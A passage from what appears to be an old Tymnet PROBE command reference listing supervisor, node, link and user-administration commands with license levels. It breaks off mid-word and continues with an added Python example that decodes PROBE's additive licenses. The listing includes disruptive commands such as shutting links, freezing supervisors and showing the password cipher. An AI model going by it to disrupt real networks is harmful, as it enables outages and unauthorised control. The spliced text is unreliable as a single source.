                           node 'x'.
CSTAT           00/04      Displays time, login, rate, and network
                           status every 15 seconds.
EXC O|S|P       00/04      Displays links that are overloaded (O), or
                           shut (S), or out of passthroughs (P).
HOST x          00/04      Displays information about host 'x' or all
                           hosts.
LACCT           00/04      Displays number of last accounting block
                           collected by RAM session record data.
LRATE           00/04      Displays Supervisor login rate in logins per
                           min.
LSHUT           00/04      Displays shut links table.
LSTMIN          00/04      Displays circuit status information gathered
                           by Supervisor during preceding minute.
N x             00/04      Displays status info about node 'x'.
OV x            00/04      Displays overloaded links.
PERDAT          00/04      Displays Supervisor performance data for
                           preceding min.
RTIME           00/04      Reads 'Super Clock' time and displays year,
                           and Julian date/time.
STAT            00/04      Displays network status information.
SYS             00/04      Displays host number running PROBE.
TIME            00/04      Displays Julian date and network time.
TSTAT           00/04      Displays same information as STAT, preceded
                           by Julian date/time.
VERSION         00/04      Displays current versions of PROBE and
                           Supervisor software.
WHO             00/04      Displays active PROBE users and their job
                           labels.

LOG MESSAGE CMDS:

Command         Lic. Lvl   Description
-------         --------   -----------
LOG             00/04      Outputs network information from Supervisor
                           log.
REPORT          00/04      Controls output of node reports.
RLOG m1..m4     00/04      Restricts log output to up to four message
                           numbers. M1- 1st Message, M2- 2nd Message,
                           etc.
RNODE n1 n2     00/04      Restricts log output to messages generated at
                           nodes N1 and N2.

NETWORK LINK CMDS:

Command         Lic. Lvl   Description
-------         --------   -----------
CSTREQ n1 n2    20         Requests total speed of all lines on
                           specified link. (n1= 1st Node n2= 2nd Node)
ESHUT n1 n2     20         Shuts specified link and enters it on shut
                           links table. (n1= 1st Node n2= 2nd Node)
PSTAT n Hhost p 20         For node 'n', displays status of logical
                           ports for port array 'p' on 'host'. Note the
                           capital 'H' must precede the host specific.
RSHUT n1 n2     20         Opens specified link and removes it from shut
                           links table.
SYNPRT n        20         Displays status of async ports on node 'n'.
TRACE n Hhost p 20         Traces specified circuit. Where 'n' is node,
   or n Sp      20         'host' is HOST, and 'p' is port. Or for
                           secondary command: 'n' node name, 'p' port.
                           Again, 'S' must precede the port name.
T2BORI n1 n2    20         Resets communication channel between node n1
                           and node n2.

NETWORK NODE CMDS:

Command         Lic. Lvl   Description
-------         --------   -----------
CLEAR n         10         Opens all links on node 'n'.
DLOAD n         10         Causes node 'n' to execute its downline load
                           bootstrap program.
NSHUT n         10         Shuts all links on node 'n'.
RETAKE n        10         Causes Supervisor to release and retake
                           control of node 'n'.
SPY             10         Displays last 32 executions of selected
                           commands.

NETWORK SUPERVISOR CMDS:

Command         Lic. Lvl   Description
-------         --------   -----------
AWAKE           01         Wakes a sleeping Supervisor. (Only one
                           Supervisor is active at one time; however,
                           there can be supervisors 'sleeping'.)
CLASS           01         Causes Supervisor to read Netval class and
                           group definitions.
DF s            01         Increases Supervisor's drowsiness factor by
                           's' seconds.
ETIME           01         Sets time known to Supervisor.
FREEZE          01         Removes Supervisor from network.
PSWD            01         Displays password cipher in hex.
SLEEP           01         Puts active Supervisor to sleep.
THAW            01         Initializes frozen Supervisor.
TWAKE           01         Wakes sleeping Supervisor, automatically puts
                           active Supervisor to sleep and executes a
                           CSTAT command.

USER UTILITY CMDS:

Command         Lic. Lvl   Description
-------         --------   -----------
ENTER           01         Adds/deletes/modifies Probe usernames.
HANG x          01         Logs off user with job label 'x'.
LIST            01         Displays Probe usernames.
ULOGA           20         Enters user-generated alphabetic message in
                           msg log.
ULOGH           20         Enters user-gener
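The additive PROBE license scheme above, worked through as an added example (my code, not Tymnet's or the article's): it splits a summed license such as CONTROL's 37 back into the individual licenses from the table, checks a command's 'Lic. Lvl' requirement against it, and works out the smallest license an operator needs for a given set of commands. The command table is the subset quoted in this article, and the function names are mine.

```python
# PROBE licenses exactly as the article's table lists them. A user's
# license is the SUM of the individual values (CONTROL = 37 = all of them).
PROBE_LICENSES = {
    20: "effect changes to network links",
    10: "effect changes to node status",
    4:  "view-only, no automatic logoff",
    2:  "effect changes to supervisor disks",
    1:  "effect changes to network supervisors",
}

# Required license per command, from the command tables above.
# 0 stands for the "00/04" view-only commands any PROBE login may run.
COMMAND_LICENSE = {
    "WHO": 0, "STAT": 0, "LOG": 0, "AN": 0, "ACCT": 0, "CHANGE": 0,
    "CSTREQ": 20, "ESHUT": 20, "RSHUT": 20, "TRACE": 20, "ULOGA": 20,
    "CLEAR": 10, "DLOAD": 10, "NSHUT": 10, "RETAKE": 10, "SPY": 10,
    "AWAKE": 1, "FREEZE": 1, "SLEEP": 1, "PSWD": 1, "ENTER": 1, "HANG": 1,
}


def decode_license(level):
    """Split a summed PROBE license into the set of individual licenses.

    Greedy subtraction from the largest value is unambiguous here because
    1 + 2 + 4 < 10 and 1 + 2 + 4 + 10 < 20; a remainder means the number
    is not a valid sum of table entries (e.g. 38).
    """
    remaining, held = level, set()
    for value in sorted(PROBE_LICENSES, reverse=True):
        if remaining >= value:
            held.add(value)
            remaining -= value
    if remaining:
        raise ValueError(f"{level} is not a sum of PROBE licenses")
    return held


def describe(level):
    """Human-readable list of what a license number grants."""
    return [PROBE_LICENSES[v] for v in sorted(decode_license(level))]


def permitted(level, command):
    """True if a user with this license may run the command."""
    needed = COMMAND_LICENSE[command]
    return needed == 0 or needed in decode_license(level)


def idle_logoff_minutes(level):
    """Users without license 04 are dropped after 20 idle minutes."""
    return None if 4 in decode_license(level) else 20


def minimal_license(commands, no_idle_logoff=False):
    """Least-privilege license for a set of commands an operator needs."""
    needed = {COMMAND_LICENSE[c] for c in commands} - {0}
    if no_idle_logoff:
        needed.add(4)
    return sum(needed)


if __name__ == "__main__":
    print("CONTROL (37):", describe(37))
    print("links-only operator needs:", minimal_license(["WHO", "ESHUT"]))
```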